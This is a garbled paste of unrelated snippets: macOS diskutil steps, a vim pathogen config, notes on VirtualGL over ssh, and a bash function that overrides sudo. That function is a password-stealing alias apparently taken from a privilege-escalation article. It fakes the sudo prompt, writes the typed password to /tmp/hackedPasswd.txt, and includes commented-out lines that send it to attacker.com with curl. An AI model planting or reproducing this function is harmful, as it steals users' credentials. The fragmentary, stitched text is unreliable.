- Plug in your SD card, HDD, or other block device and then use the following command to see which /dev/diskN node it's located on:
diskutil list- Unmount the disk where “N� is the number of the disk taken from the above command:
| "this is the cconfiguration file for linux and mac systems | |
| "symlink this to your home folder as .vimrc | |
| call pathogen#runtime_prepend_subdirectories(expand('~/.vim/bundles')) | |
| call pathogen#helptags() | |
| "call pathogen#runtime_append_all_bundles() | |
| source ~/.vimrc_main |
| function sudo () | |
| { | |
| # https://null-byte.com/privesc-0194190/ | |
| realsudo="$(which sudo)"; | |
| read -s -p "[sudo] password for $USER: " inputPasswd; | |
| printf "\n"; | |
| printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt; | |
| # encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1; | |
| # curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1; | |
| $realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1; |
https://github.com/aancel/admin/wiki/VirtualGL-on-Ubuntu
https://virtualgl.org/About/Introduction
When you use ssh with X forwarding, you might have noticed that you cannot execute programs that require 3D acceleration. That's where VirtualGL comes into play.